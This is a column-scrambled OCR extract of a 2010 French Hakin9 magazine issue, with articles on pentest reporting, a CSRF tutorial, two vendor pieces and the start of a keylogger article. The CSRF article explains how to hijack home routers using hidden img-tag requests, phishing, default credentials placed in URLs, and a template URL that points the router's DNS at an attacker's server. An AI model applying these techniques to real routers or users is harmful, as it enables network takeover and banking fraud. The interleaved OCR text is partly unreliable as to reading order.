a été atteint et dans quelle mesure ? Le for- tests. Si nous comparons les rapports, des événements déterminés, par exem-
mat du rapport est défini à l'étape de défi- nous pouvons effectuer un certain nombre ple, suite à une modification dans la con-
nition de la méthodologie de projet avec le d'analyses. À titre d'exemple, nous pouvons figuration ou à une mise à jour du logiciel
prestataire. Quelque soit la méthodologie analyser un nombre moyen de présence ou à un ajout d'une nouvelle version de
adaptée, certains éléments du rapport sont des indicateurs du risque du type high. Les l'application.
fixes et comprennent : analyses sont effectuées pour tous les sys- La fréquence d'audits doit prévoir leur
tèmes et applications ou restreintes à un lancement régulier. Il est impossible de
• objectif et étendue des tests, service au choix. savoir si le système a été rendu plus per-
• conclusion générale, La conclusion technique et l'évaluation formant sans répéter les tests. La gestion
• analyse technique, sont souvent combinées à l'analyse tech- de la sécurité doit être régulière.
• conclusion technique et évaluation. nique. Les éléments contenus dans ce- Les mesures adaptées dans la
tte partie du rapport doivent fournir des méthodologie doivent décrire les résultats
La partie relative à l'objectif et à l'étendue informations permettant de vérifier et de dans le rapport et permettre de définir les
des tests définit les conditions et limites supprimer les erreurs détectées. priorités pour réaliser les recommanda-
adoptées pour réaliser le projet. Cette tions consécutives à l'audit.
partie décrit la procédure de réalisation Conclusion En raison d'un nombre de sys-
des tests, les scénarios de test employés, Les informations présentées dans no- tèmes et d'applications qui augmente
le calendrier de travaux effectués et toute tre article constituent une approche de sans cesse, les coûts pour les protéger
autre décision influençant l'étendue du la manière de réaliser ce type des tests deviennent également de plus en plus
projet. dans une entreprise. Le choix du type, de élevés. Les entreprises doivent souvent
La conclusion générale est un résumé l'étendue et de la méthodologie des tests choisir quelle protection mettre en place
d'analyse technique rédigé pour la direc- appartient aux personnes responsables et quelle menace accepter. Les données
tion et décrivant le niveau de sécurité du de la sécurité. du rapport doivent être présentées de
système analysé. Lors de ce choix, il faut réfléchir à manière à ce que nous puissions effec-
La partie concernant l'analyse tech- la nécessité d'effectuer des tests de tuer une analyse de risques en définis-
nique doit contenir : l'étendue détaillée pénétration complets ou de se concen- sant les risques les plus importants et en
des tests, les types d'outils utilisés, les trer plutôt sur une analyse partielle des nous concentrons uniquement sur ces
descriptions des menaces détectées et vulnérabilités. Le choix du type de test risques-là.
leur évaluation. La méthodologie adap- dépend aussi de l'objectif que nous nous
tée doit proposer les mesures permet- sommes fixé.
tant d'évaluer réellement les menaces Si nous tenons donc à une analyse de
détectées. protections, il est recommandé d'effectuer
Nous pouvons également voir des rap- un audit de sécurité complet et donc
Sebastian Stroik
ports de tests de pénétration contenant d'opter pour l'approche du type Black Box Depuis plus de 8 ans, l'auteur se consacre profession-
nellement au domaine informatique. Il est chargé au
une analyse technique des vulnérabilités et de considérer les tests comme un des
quotidien des opérations relatives à la réalisation des
détectées divisées selon les indicateurs de éléments de l'audit. Il est alors possible de projets informatiques. Il se spécialise dans les projets de
sécurité IT. Actuellement, il occupe le poste de spécialiste
risque présents dans les bases de vulnéra- nous concentrer seulement sur l'analyse de sécurité IT chez Synergy Group.
bilités disponibles (CVE). Nous prenons al- de vulnérabilités. Cette démarche réduit Contact avec l'auteur : sebastian.stroik@synergygroup.pl

22 HAKIN9 3/2010

18__22____test_penetr.indd 22 2010-03-10, 16:03:27


SERVICE REVIEW

Ilia Kolochenko, CEO de High-Tech Bridge SA

High-Tech Bridge SA a été fondée à Genève en 2007. Bien que fournissant de multiples
services et solutions relatifs à la Sécurité des Systèmes d’Information, son entreprise
principale demeure l’Ethical Hacking et le test de pénétration. Depuis sa création,
High-Tech Bridge a acquis plus de 50 clients majeurs en Suisse et à l’étranger.

H
igh-Tech Bridge se distingue Multilateral Partnership Against Cyber grandes entreprises. High-Tech Bridge
des autres sociétés de Sécurité Threats), qui regroupe les efforts de 193 facture sur la base d’un taux jour-homme
Informatique de par son niveau pays dans leur lutte contre les menaces fixe. Néanmoins, il est possible d’établir
élitiste d’expertise technique, son équipe informatiques, permet par exemple à High- des offres spécifiques aux besoins de
Suisse de confiance, son large réseau de Tech Bridge de communiquer directement clients particuliers, lesquelles sont alors
partenaires rigoureusement sélectionnés avec les dirigeants de l'industrie de la délimitées par un nombre de jours précis
et la planification exemplaire de ses sécurité des systèmes d’information et ou un coût global contractuel. Un test de
projets personnalisés. les représentants des différentes autorités pénétration peut être réalisé sous 5 jours
Le plus haut niveau d’expertise gouvernementales. en pure Black Box tout comme il peut l’être
technique d’High-Tech Bridge repose Les experts de High-Tech Bridge en 5 semaines avec une méthodologie
sur son département de Recherche & sont des citoyens suisses de réputation White Box incluant une revue de code.
Développement, lequel regroupe en une irréprochable et disposant de plus de Généralement, les clients choisissent une
seule équipe les plus grands experts en 10 ans d’expérience dans le domaine solution intermédiaire de type Grey Box.
Sécurité Informatique et des White Hat de la sécurité informatique. Leurs clients Parallèlement aux tests de pénétration
Hackers répartis sur toute la planète. peuvent vérifier l’identité de chacun et à ses audits de sécurité, High-Tech
Chercher et découvrir de nouvelles des intervenants ayant accès à des Bridge propose des services d’aide à
vulnérabilités, coder de nouveaux Exploits données confidentielles ou privées durant la reprise d’activités après incident et
0-Day et développer ses propres outils chaque test de pénétration et audit de d’investigation numérique. Ses experts
permettent à High-Tech Bridge de sécurité. Habituée à intervenir dans des en sécurité peuvent notamment effectuer
conserver constamment une longueur environnements extrêmement confidentiels, des enquêtes complexes permettant de
d’avance sur toute norme de sécurité et l’équipe a déjà été contrainte d’exercer sous découvrir la source réelle d'une attaque
autres systèmes d’évaluation automatisée surveillance vidéo et dans des bunkers lorsque les pirates ont pris le soin de
de la sécurité ou de détection de souterrains de certains clients accordant dissimuler leur identité en effectuant
vulnérabilités. La sécurité par la recherche une importance capitale à leur patrimoine de multiple rebonds sur différentes
et la prévention est la philosophie sur informationnel. À la fin de chaque projet, machines préalablement compromises.
laquelle s’appuient ses tests de pénétration. toutes les informations relatives au client Cette prestation particulière est de plus
Son équipe découvre les vulnérabilités sont restituées et les données résiduelles en plus sollicitée. Par ailleurs, High-
avant les Hackers, et y remédie avant les de l’audit sont irréversiblement détruites. De Tech Bridge surveille constamment les
développeurs concernés. même, chaque mandat commence par un ressources communes à de nombreux
High-Tech Bridge coopère avec solide accord contractuel sous forme de Hackers dans le but de rester informée
diverses sociétés de sécurité et de NDA (Non Disclosure Agreement) mutuel, sur la communauté Underground.
multiples fournisseurs de logiciels pour permettant d’assurer l’absolue confidentialité Pour tout complément d’information,
élaborer les meilleures solutions proactives des données de leurs mandants. n’hésitez pas à consulter le site WEB
et permettre une diffusion optimale des La planification de leurs projets est officiel de High-Tech Bridge:
correctifs sécuritaires. Un partenariat flexible et convient parfaitement aux http://www.htbridge.ch.
stratégique avec IMPACT (International besoins spécifiques des moyennes et

3/2010 HAKIN9 23

23___HTbridge.indd 23 2010-03-11, 12:46:06


FOCUS
DAVID TORTEL

La vulnérabilité
Cross Site
Request Forgery
Degré de difficulté Cet article explique la vulnérabilité Cross Site Request Forgery,
nom que nous abrègerons indifféremment en CSRF ou XRF dans
toute la suite du document. Nous reviendrons d’abord sur une
méthode qui a été utilisée pour prendre le contrôle d’une box grâce
à l’exploitation de la vulnérabilité Cross Site Request Forgery. Nous
expliquerons ensuite, à titre anecdotique, en quoi consisterait une
attaque de type drive by pharming.
Aujourd’hui, internet s’est très largement la victime. Bien qu'elle soit aujourd’hui encore très
développé dans les foyers français. Seize peu médiatique et assez peu documentée sur
millions et demi de foyers - estimation au 30 le Web, elle fait en 2007 une entrée fracassante
Septembre 2007, selon l’Arcep - possèdent dans le classement de l’OWASP ("Le top 10 de
une connexion internet, qui, pour la plupart l'Owasp fournit des méthodes de base pour se
s’étend à l’offre télé/téléphone. Par ailleurs, pour protéger contre les vulnérabilités" Sébastien Gioria,
connecter plusieurs machines et gagner en le président du bureau français de l'Owasp).
mobilité, les utilisateurs choisissent souvent le Très facile à mettre en place, elle obtient un
mode wifi. Le mode wifi permet la transmission taux de réussite très impressionnant et peut,
des données par ondes radio autour d'un point par conséquent, être à l’origine d’attaques très
d’accès ; ainsi, plusieurs ordinateurs peuvent compromettantes. Le CSRF se mène de n’importe
être connectés simultanément. Néanmoins, où, par n’importe qui sous réserve de quelques
ces ondes sont captables par un ensemble de connaissances fondamentales.
machines espionnes placées à une distance Le principe est simple : le navigateur de la
CET ARTICLE raisonnable. Guillaume Valadon, dans son article victime est forcé d'envoyer une requête silencieuse
EXPLIQUE... Tour d’horizon du wifi à Paris (MISC janvier/février vers un site où elle possède un accès privilégié.
La vulnérabilité XRF, les 2008), explique que dans les 5emes et 13èmes Ainsi, la confiance qu’un site attribue à l’utilisateur
paramètres d'URL, la force
de la balise img, les détails arrondissements de Paris on compte entre 3107 est détournée.
d'anciennes attaques pour la et 5090 points d’accès sans fil par kilomètre
compromission d'un routeur
personnel, la notion de drive by carré. L'omniprésence de ces box donne une Les paramètres d'URL
pharming légitimité à cette cible. La configuration du réseau Toutes les URL ne servent pas uniquement à
Nous allons revenir sur ces que nous allons étudier est la configuration adresser une page ou un site Web. D'autres, qui
attaques qui ont pu défrayer
la chronique des scandales il
minimale, la plus repandue, à savoir une box, des font appel aux paramètres d'URL permettent
y a quelque temps mais qui, ordinateurs connectés à cette box qui sert de d'exécuter une action. Un paramètre d’URL est
même si elles sont aujourd’hui
souvent avortées, pourraient
passerelle du réseau local vers le réseau internet. un binôme nom/valeur qui ajouté à la fin de l’URL
certainement ressurgir un jour Nous verrons comment prendre possession d'un après un point d'interrogation, permet de donner
ou l’autre.
routeur personnel en exploitant une faille du type des valeurs précises aux paramètres. Chaque
CE QU'IL FAUT Cross Site Request Forgery. valeur correspond à une action particulière. Par
SAVOIR... exemple, une requête vers l’URL
Notions sur le développement XRF, une faille de niveau applicatif http://www.parametredurl.com/exemple/para
web et les protocoles applicatifs, Le Cross Site Request Forgery est un type de faille metre.php?compte=4593028492&versement=1&
idées sur le fonctionnement du
protocole HTTP de niveau applicatif ; elle exploite le navigateur de somme=10000& compte2=544789375

24 HAKIN9 3/2010

24_28___csff.indd 24 2010-03-10, 16:14:47


LA VULNÉRABILITÉ CROSS SITE REQUEST FORGERY

peut correspondre au versement de – fonctionnement normal -. Dès lors, le la taille du cadre. Si nous créons un
la somme de 10000 euros du compte navigateur enverrait une requête vers cadre de taille nulle, nous pourrons,
4593028492 vers le compte 544789375. l'URL piégée sans que l'utilisateur ne s'en comme précédemment, appeler une
Une action passe par la modification d’un aperçoive (cf. Figure 2). URL piégée, de façon transparente.
paramètre et donc la modification de • Un script dans un mail Ce script
l'URL. La requête avec la nouvelle URL Un piège bien maquillé pourrait lancer la connexion vers une
est envoyée au serveur qui commande Si la balise image est un outil puissant, autre page.
l'exécution de l'action, sous réserve que la requête peut être cachée de diverses • Une url vers un site piégé contenant
l'expéditeur soit identifié et authentifié. façons : des images cachées (ou des
L’idée directrice de la faille CSRF est de IFRAMES intégrés) qui effectuent des
piéger la victime en faisant appel à ce • Une balise img dans un mail requêtes. Le nom du site peut être
genre d’URL. Car, lorsque la victime suit un Cependant, un obstacle subsiste. caché en utilisant un lien hypertexte.
lien avec une URL piégée vers un site où Certains webmail ou logiciels de • Une URL piégée - qui effectue l’action
elle a des privilèges particuliers, elle peut messagerie désactivent par défaut souhaitée - mais cachée par dans
exécuter une action, sans s'en apercevoir. le téléchargement automatique un lien hypertexte. Dès lors, lorsque
Il s’agit donc de proposer un lien des images afin d’avorter ce genre l’utilisateur suit le lien hypertexte, il
malicieux à la victime mais de le d’attaque (cf. Figure 3). Lorsque effectue lui-même la requête.
déguiser afin qu’elle fasse une requête la victime consulte ses mails, ces
involontairement. logiciels de messagerie lui proposent Grâce à l'une de ces méthodes, il sera
d’afficher les images. Par défaut, donc possible au pirate de maquiller
La force de la balise img l’utilisateur affiche souvent les images, sa requête afin que la cible exécute une
Le langage HTML est un langage de surtout si le sujet l’intéresse. action sans s'en apercevoir. Voyons quels
balisage qui permet de décrire la mise en • Un cadre intégré IFRAME IFRAME est risques encourent la victime et comment
forme des objets sur une page Web. Il est une balise html qui "est utilisée afin peut se présenter une telle attaque.
directement interprété par le navigateur d’insérer dans une page HTML un autre
(Internet Explorer, Firefox, Safari…). document HTML (définition CERTA au Un scénario d'attaque
Lorsque ce dernier trouve une balise img, 17/07/2008)". Les paramètres sont Un utilisateur est connecté sur le site de
il procède au téléchargement de l’image. l’URL du document HTML à insérer et sa banque, afin de voir l’évolution de ses
Par exemple, pour le code

<img src=http://
www.sitedefectueux.com/image/
exemple.gif>

il télécharge l’image exemple.gif


sur le serveur qui héberge le site
sitedefectueux.com. Cette opération est
transparente pour l’utilisateur. Dans le
cas où l’image n’existe pas, la requête est
quand même postée et le serveur renvoie
une erreur du type 404 not found .
Lorsqu’un utilisateur demande la
connexion à une page Web, plusieurs
requêtes GET sont émises. Elles se
capturent au moyen d’un analyseur d’entête.
La capture d’écran ci-dessous démontre
que la méthode GET employée est identique Figure 1. la méthode GET est utilisée tant pour charger une page web que pour charger
pour l’affichage d’une image et pour le une image
chargement d’une page (cf. Figure 1).
Le navigateur ne fait aucune différence
entre une requête GET pour une page web
ou pour une image. Ainsi, le pirate pourrait
piéger une balise img, par exemple avec
Figure 2. Les balises images sont des vecteurs d'attaque très puissants car ils
une URL permettant d’effectuer une permettent d'effectuer une requête parfois malicieuse de manière transparente pour
action plutôt que d’afficher une image l'utilisateur.

3/2010 HAKIN9 25

24_28___csff.indd 25 2010-03-10, 16:14:56


FOCUS
comptes. En même temps, il décide de quelques paramètres de connexion : le type nécessaire que celui-ci télécharge l'image
surfer un peu ; il oublie de fermer sa session. de chiffrement, la clé secrète, la transmission piégée, qui comportera l'URL malicieuse.
Il reste alors toujours connecté, identifié et ou non en wifi, configuration de l’IP des Pour cela, il convient de se pencher une
authentifié sur le site de sa banque. Arrive clients du réseau local, reconfiguration des seconde sur la technique de phishing. Il
maintenant un pirate malhonnête qui envoie passerelles… grâce à une URL du type http: s’agit ici d’exploiter la faille humaine en
à l’utilisateur un e-mail bien ciblé qui contient //adresseIpDeLaBox. La connexion à cette dupant la cible par le biais d’un courrier
un sujet excitant ; ici, le social engineering adresse est possible par toute personne électronique semblant provenir d’une entité
peut jouer un rôle : connaître sa victime et étant connectée au réseau. Donc n’importe de confiance (une société ou une personne
bien cibler ses centres d’intérêt. Très souvent, qui, présent sur ce LAN, a la compétence qu’ils connaissent). Ce mail propose au
le webmail ou le logiciel de messagerie pour changer tous ces paramètres, sous lecteur de se connecter en ligne via un
bloque les images. Intéressé par le sujet du réserve d’un mot de passe. lien hypertexte. Pour cela, il est important
mail, la victime décide d’afficher les images Lorsqu'il se connecte à cette URL, de bien connaître sa cible. Une bonne
et procède alors au téléchargement de l’utilisateur est confronté à une page web technique de social engineering consisterait
toutes les images. Le problème, c’est qui lui demande un nom d’utilisateur et un à s'en rapprocher afin de cerner ses centres
qu’en chargeant les images, il a également mot de passe pour continuer. Ces noms d’intérêt. Puis, nous prendrons quelques
téléchargé des images qu’il ne verra pas. d’utilisateurs et ces mots de passe sont heures pour concocter un mail qui puisse
Ces images ne sont pas affichées car les très souvent ceux proposés par défaut arriver à l’intéresser suffisamment. Une fois
balises ciblaient une adresse piégée. Cette par les fabricants qui fournissent le routeur. piégé, une partie de l’attaque aura déjà été
URL demandait d’effectuer une action sur Une fois identifié et authentifié, l'utilisateur un succès…
le site de la banque. Du point de vue de peut modifier tous les paramètres de A titre d'exemple, les dernières attaques
la banque, cette requête semble provenir connexion comme il le désire. de phishing recensées ont pris l’identité de
directement de l’ordinateur de la victime (de Il s'agit donc pour nous de trouver free (Attaque phishing contre les abonnés
sa session) et donc, par extrapolation, de un moyen de pénétrer dans le LAN. Free : http://www.mag-securs.com/
la victime elle-même. Dès lors, la requête Ainsi, une fois identifié avec les noms spip.php?article13192), ont parlé de la crise
est traitée directement sans demande et mots de passe par défaut, nous ou du chômage, ont proposé de l'emploi
d’authentification. Ainsi, le pirate aurait pu serons en mesure de prendre le contrôle en ligne, un faux héritage ou encore, ont
lui faire faire un versement bancaire sans du point d'accès. Un moyen efficace exploité le réseau social Facebook…
qu’elle ne s’en rende compte, sous réserve pour pénétrer dans le réseau est le A nous de choisir le thème qui intéressera
qu’elle ait une banque très mal sécurisée. retrait du chiffrement des données. le plus notre cible.
Cette action n'est pas invisible pour
Vulnérabilité CSRF des box, l'utilisateur connecté. Il faudra donc mener L'attaque proprement dite
un cas pratique une attaque-éclair : enlever le chiffrement Une fois le thème choisi, il convient de
Une fois les fondements théoriques de la grâce à une attaque CSRF, se connecter bien concocter notre lien piégé, c'est-à-dire
vulnérabilité assimilés, voyons comment à la box, récupérer la clé (WEP ou WPA), l'URL exacte d'action que nous voulons
certains ont exploité cette faille pour s'assurer de ne pas être piégé avec le exécuter. Celle-ci aura pour but de forcer
prendre possession d'une box. filtrage MAC (nous pourrons noter une l’utilisateur à enlever le chiffrement des
MAC acceptée puis nous connecter avec)- ondes radio.
L'interface administrateur, une et remettre le chiffrement. Pour comprendre le déroulement des
porte de passage opérations au niveau machine, nous nous
La plupart des box possèdent une interface Utilisation du phishing connectons chez nous et nous enlèvons
administration. Cette interface est directement La première difficulté est d’arriver à l’option "chiffrement des données". La
accessible par l’utilisateur qui veut modifier piéger l’utilisateur. Il nous est absolument confirmation se fait par l’activation d’un

Figure 3. Certains webmails, comme Gmail n'affichent pas les images afin de protéger les utilisateurs de ce vecteur d'infection

26 HAKIN9 3/2010

24_28___csff.indd 26 2010-03-10, 16:15:05


LA VULNÉRABILITÉ CROSS SITE REQUEST FORGERY

bouton pour envoyer les paramètres à un Pour piéger quelqu’un avec cette méthode, La réponse au premier problème est
fichier. Les variables envoyées sont : l’option il convient de connaitre le modèle exact quasi-immédiate, il suffit de découvrir son
choisie (ici, le cryptage en WEP), le SSID du du routeur de la victime, se le procurer SSID, ce qui est très facile avec des outils
réseau, le niveau de sécurité ainsi qu’une et l'étuder de manière pointue afin de comme aircrack.
variable demandant si le filtrage MAC est découvrir, grâce aux méthodes proposées Pour le problème identification/
activé. Nous pouvons facilement capturer ci-dessus, les paramètres utiles et leur authentification, il convient de remarquer que
l’adresse appelée en utilisant un ajout de valeur. les box sont livrées avec un mot de passe
Firefox appelé Tamper Data, ou utiliser http Voici quelques problèmes qui par défaut, très rarement modifié. Par ailleurs,
headers - Ce module complémentaire susceptibles de survenir dans la quasi il est possible de s'identifier sur une page
permet de capturer l’ensemble des requêtes totalité des cas : grâce à une URL avec la syntaxe suivante:
http émises. C'est vers ce type d'URL que la http://login:motdepasse@nomdusite. Si
cible devra faire une requête, permettant ainsi • Il faut connaitre le SSID du réseau WIFI nous intégrons, avec cette méthode, les
le non chiffrement des dialogues AP/station. à piéger mots de passe et nom d’utilisateurs par
L’analyse du résultat proposé par • L’accès à la zone d’administration est défaut dans l’URL piégée, nous aurons
http header permet de connaître tous filtré avec un couple nom d’utilisateur/ résolu le deuxième problème.
les paramètres importants ainsi que la mot de passe. A titre d’information, le site internet
valeur qu’il faut leur attribuer pour enlever le • Une protection propre à firefox mag-securs, spécialisé dans la sécurité
chiffrement des données sur une box qui demande une validation pour se informatique expliquait le 26 Janvier 2009
ne nous appartient pas. connecter à ces URL mais, intégré qu’une telle faille était exploitable sur les
Il est important de noter que toutes les dans une page HTML cette protection routeurs Siemens ADSL SL2-141. Car, pour
box fonctionnent de manière différente. disparait. faire face à cette attaque, les routeurs de

P U B L I C I T É

24_28___csff.indd 27 2010-03-10, 16:15:14


FOCUS
type Siemens sont dotés d’un jeton qui le site. Dès lors, le navigateur place connecter à la volée sur le routeur de la
prend une valeur aléatoire. Le jeton prend cette conversion dans son cache DNS victime au travers d’une attaque CSRF puis
une valeur aléatoire entre 0 et 11000. Il faut puis il adresse sa requête à l’adresse IP lui proposer l'adresse d'un nouveau serveur
tester avec toutes les valeurs possibles correspondante. DNS. Cette attaque est une attaque très
(11001 possibilités). Pour ceci, il faut parvenir Prenons un exemple : la victime rapide à mettre en place.
à faire exécuter un script sur l’ordinateur de veut se connecter au site de sa banque
la victime afin qu'il teste toutes les valeurs. www.mabanque.com. Elle saisit donc Le drive by pharming d'un point de
Un tel script est disponible sur internet à cette adresse dans la barre URL. Le vue pratique
l’adresse http://www.mag-securs.com.sp navigateur vérifie s’il possède la conversion Ainsi, nous forçons l’utilisateur à charger
op.php?article12681. Cette solution prend www.mabanque.com/ IP dans son cache. une URL du type
du temps, l’utilisateur peut s’en apercevoir. Le cache est rafraichi environ toutes les http://login:motdepasse@adrIPduroute
Une fois que l’URL piégée est trois minutes. S’il n’a pas l’adresse IP ur/index.php?dns=w.x.y.z
découverte, un mail est proposé à la recherchée, il fait appel au protocole DNS. avec les méthodes expliquées ci-
victime afin que celle-ci exécute l’action. Si Pour cela, il envoie une requête DNS vers dessus o`u w.x.y.z représente l’adresse IP
une méthode GET est lancée vers le lien, son routeur ; l’adresse du serveur DNS serveur DNS du pirate. Certains routeurs
les données circuleront en clair. interne est déterminée lors de la connexion nécessiteront un redémarrage pour
de la machine au sous-réseau au travers prendre en compte cette modification. Une
Le drive-by pharming du protocole DHCP, il s’agit du routeur dans fois cette étape terminée, le pirate maitrise
Si le but de notre attaque est d’amener la plupart des cas. Ce dernier possède parfaitement les visites de son voisin
l’utilisateur à se connecter à une machine l’adresse du serveur DNS légitime à qui piégé. S’il était malhonnête, il pourrait alors
piégée, une solution pratique consiste il doit transmettre la requête, à condition le renvoyer vers ses propres sites (ce qui
à corrompre la bonne marche du de ne pas posséder la réponse dans son serait tout à fait transparent pour pour la
protocole DNS. Dans cette hypothèse, il cache ; cette adresse est configurable et victime car elle taperait ses propres URL) et
faut, auparavant, avoir mis au point des se trouve dans les propriétés de la box. Le lui voler des informations sensibles.
sites trompeurs profitant de la naïveté de drive by pharming intervient ici en injectant
l’utilisateur. dans le routeur une adresse de serveur Conclusion
DNS primaire non légitime. Ainsi, l’entité Nous avons tenté de vous expliqué
Le drive by pharming en théorie qui fournit une réponse à la requête DNS, une méthode pour prendre le contrôle
Le drive by pharming est une variante du comme elle n’est pas légitime, peut servir d’une box dont le site web lié à son
scénario CSRF. Elle a été nommée ainsi les intérêts d’un pirate malveillant. Si la administration comporterait une faille de
par l’équipe de Symantec. Cette technique véritable adresse de www.mabanque.com type CSRF. Nous avons réussi à changer le
cible tout particulièrement les routeurs était par exemple 192.87.58.09, alors le mode de chiffrement du point d'accès ou
personnels. Nous allons ici étudier le drive-by-pharming – et plus precisement à en détourner le DNS. Voici des attaques
principe général de cette attaque avant le faux serveur DNS - jouerait son rôle en assez originales et, somme toute, assez
de l’appliquer au cas concret qui nous insérant l’association www.mabanque.com peu développées sur le web, mais dont
intéresse. = 134.87.46.28 . Cette adresse IP est, par nous pouvons redouter à l’ avenir qu’elles
Nous venons de voir en quoi consiste exemple, l’adresse d’un site malicieux reviennent faire la une des actualités.
une exploitation de la vulnérabilité CSRF dont le design est très proche de celui de Car si des contre-mesures très simples
: il s’agit d’inciter une victime à faire une www.mabanque.com, pour que la victime permettent de corriger cette faille - potions
requête vers une url piégée. Dès lors, nous ne se doute de rien. qui sont déjà appliquées à la plupart des
forçons le navigateur à envoyer une requête Cette opération reste invisible pour interfaces d’administration. Un developpeur
silencieuse à l’insu de l’internaute. Le terme l’utilisateur qui reste persuadé qu’il s’est n’est jamais àl’abris d’un oubli qui pourrait
de pharming doit également être assimilé. connecté au site de sa banque. Dès lors, nous permettre de ressortir ces vieilles
Il exprime la redirection du serveur DNS il saisit en toute confiance des données techniques.
de la victime. Le protocole DNS assure confidentielles que nous seront en mesure
la conversion nom de domaine/ adresse de récupérer.
IP. Ainsi, lorsque l’utilisateur saisit une URL, Le drive by pharming reprend donc
celle-ci est traduite par le protocole DNS deux notions : celle de vulnérabilité CSRF
en l’adresse IP du serveur qui héberge et celle de pharming. Il s’agit donc de se
À propos de l'auteur
David est étudiant à Télecom Paristech, école
Sur Internet d'ingénieurs spécialisée dans les nouvelles technologies
de l'information et de la communication. Actuellement
élève d'un master ès sécurité de l'information, il
• http://www.symantec.com/avcenter/reference/Driveby_Pharming.pdf– explication détaillée s'intéresse aux vulnérabilités non seulement techniques
datant de 2006 du drive by pharming mais également humaines, honorant ainsi le social
• http://www.owasp.org/images/c/ce/OWASP_Top_10_2007_-_French.pdf engineering d'une place de choix sur la scène de
l'intrusion dans un système d'informations.

28 HAKIN9 3/2010

24_28___csff.indd 28 2010-03-10, 16:15:24


INTERVIEW

Olivier Franchi et Paolo Pinto sont Directeurs Associés de Sysdream depuis 2007. Co-fondateur, Paolo Pinto
est expert certifié en sécurité informatique, il est le Directeur Technique de Sysdream. Olivier Franchi, directeur
commercial, est issu du milieu industriel des produits et services destinés aux SI.

Pouvez-vous nous présenter Sys- vulnérable aux attaques. Pouvez- Quelles sont les mesures à pren-
dream et son activité ? vous nous expliquer comment se dre pour assurer la sécurité opti-
Sysdream est un cabinet de conseil passe un tel test d'intrusion ? male de son SI ? Est-il nécessaire
& d'audit en sécurité informatique, de L'idée principale d'un test d'intrusion est de former des personnes respon-
développement sécurisé et de formation. de se mettre en condition réelle d'attaque sables pour les applications de
Spécialisé dans l'audit, de plus en plus de afin de mettre en évidence les points de mesures de sécurité ?
clients nous contactent pour la formation faiblesse de l'infrastructure cible. En fonction Comme tout art ou technologie, il est
d'administrateur, d'analyste ou d'expert des informations et des demandes que le souvent nécessaire de les comprendre
en sécurité informatique, véritable point client fournit à nos équipes, les consultants pour pouvoir les utiliser au mieux. Même
central aujourd'hui, de la fiabilité des s'appliquent à effectuer divers tests durant avec des outils perfectionnés, les logiciels
modèles économiques. une période que le client a définie : scanner offrant une sécurité prêt à l'emploi perdent de
de services et de vulnérabilités, social leur efficacité avec une personne néophyte.
Sysdream mise sur les recher- engineering et reversing d'applications princi- C'est la principale raison du succès de
ches pointues dans les processus palement. S'en suit alors un rapport complet nos formations. L'homme est bien souvent
de sécurité en entreprise. Quelle détaillant le travail des consultant, les failles le seul capable d'analyser et de prédire un
est votre mission dans le dévelop- détectées et les corrections à apporter. événement malheureux dans son SI.
pement ?
Tout le monde ne peut s'improviser expert Quels types d'interventions Sysdream propose des forma-
en sécurité informatique et la constante propose Sysdream en matière tions en sécurité. Qui sont vos
évolution des technologies et des logiciels d'audit de sécurité ? formateurs et à qui s'adressent
impose bien souvent un risque grandissant Il y a plusieurs types d'audit de sécurité vos formations ?
pour les entreprises. Ce constat nous pratiqué par Sysdream. L'audit technique, Nos formateurs sont nos consultants,
a poussés à investir nos recherches sur qui désigne généralement le test chacun étant expert dans un domaine
l'amélioration d'outils visant à transférer notre d'intrusion et l'audit organisationnel qui particulier. Ils alternent audits et formations
expertise dans certains domaines comme permet d'analyser la politique de sécurité afin de rester en permanence au faîte des
Syclop, un outil de test de pénétration évolué globale de l'entreprise. Concernant l'audit dernières techniques et des méthodologies
ou encore Sysghost, un système de ghost technique, il existe plusieurs types de test des hackers, ceci pour proposer aux
sécurisé permettant l'analyse forensic et d'intrusion. Le premier, le plus demandé stagiaires une formation complète au
l'acquisition de data, via le réseau. De plus, par les clients, est la Boîte Noire. Le plus proche de la réalité. Les formations
nous participons au perfectionnement des client désigne simplement la ou les s'adressent à un public professionnel
solutions actuelles avec la recherche des infrastructures qu'il souhaite tester sans en relation directe avec les nouvelles
vulnérabilités sur les logiciels grand public nous donner plus d'information. Nos technologies. La sécurité, si longtemps vue
ou l'approfondissement de nos supports consultants se mettent alors dans la peau comme une spécialité réservée à quelques
de cours pour nos stagiaires. Sysdream des hackers et identifient puis testent un cas précis, est aujourd'hui devenue
est labellisée JEI depuis 2009 grâce à ses maximum de vulnérabilités connues ou primordiale face à l'espionnage industriel, la
efforts dans le domaine de la recherche de non. Le second type de test d'intrusion cyberdélinquance et les failles de sécurité
vulnérabilités. est la Boîte Blanche. Ici, nous opérons lors du développement ; en résumé, nos
avec la participation complète du client. formations s’adressent à tous ceux qui
Les tests de vulnérabilités et tests Avec un plein accès aux informations de sont confronté à ces problèmes, de près,
d'intrusions permettent de savoir l'infrastructure, nous analysons alors en ou de loin.
si l'entreprise est potentiellement détails la politique de sécurité du client. www.sysdream.com

3/2010 HAKIN9 29

29___sysdream.indd 29 2010-03-11, 15:29:22


FOCUS
MICHAEL R. HEINZL

Les
keyloggers
Une menace sérieuse
Degré de difficulté

Les keyloggers représentent une menace sérieuse tant pour les


entreprises que pour les particuliers. Leur but est d'enregistrer
l'ensemble des données saisies par l’utilisateur pour les transmettre
à l'attaquant.

P
lusieurs méthodes permettent à un Bien que dans certains cas, d'autres méthodes
attaquant de récupérer des données saisies puissent être employées, les keyloggers sont de
par un utilisateur (informations utilisateur, e- plus en plus utilisés par la médecine légale dans
mails, coordonnées bancaires…). Un attaquant le cadre des affaires criminelles. Dans ce dernier
peut alors transférer de l'argent du compte de cas, leur utilisation est justifiée.
sa victime vers son propre compte bancaire ou Mais malheureusement, les keyloggers sont
mener d'autres actions frauduleuses. « détournés » de leur fonction première à des fins
Dans le cadre de cet article, nous aborderons frauduleuses. En règle générale, ces affaires font
l’utilisation des keyloggers matériels avant de nous la une de la presse. Les keyloggers permettent
intéresser aux différentes méthodes et outils pour notamment aux attaquants de subtiliser des
s'en prémunir. données confidentielles telles que les mots de
passe, noms d'utilisateur, données internes à
Présentation une entreprise, coordonnées bancaires... pour les
Un keylogger est une solution matérielle ou revendre à des organisations criminelles ou pour
logicielle qui permet d'enregistrer l’ensemble menacer leurs victimes en échange de rançons.
des données saisies par un utilisateur (Voir Différents modèles de keyloggers existent sur
Figure 1). le marché, toutefois ils peuvent être divisés en deux
De nombreuses raisons peuvent expliquer grandes catégories : les keyloggers logiciels et les
l’utilisation d’un keylogger. Les fabricants de ce type keyloggers matériels.
de logiciels/matériels [1] [2] [3] [4] les emploient de Dans le cadre de cet article, nous nous
CET ARTICLE
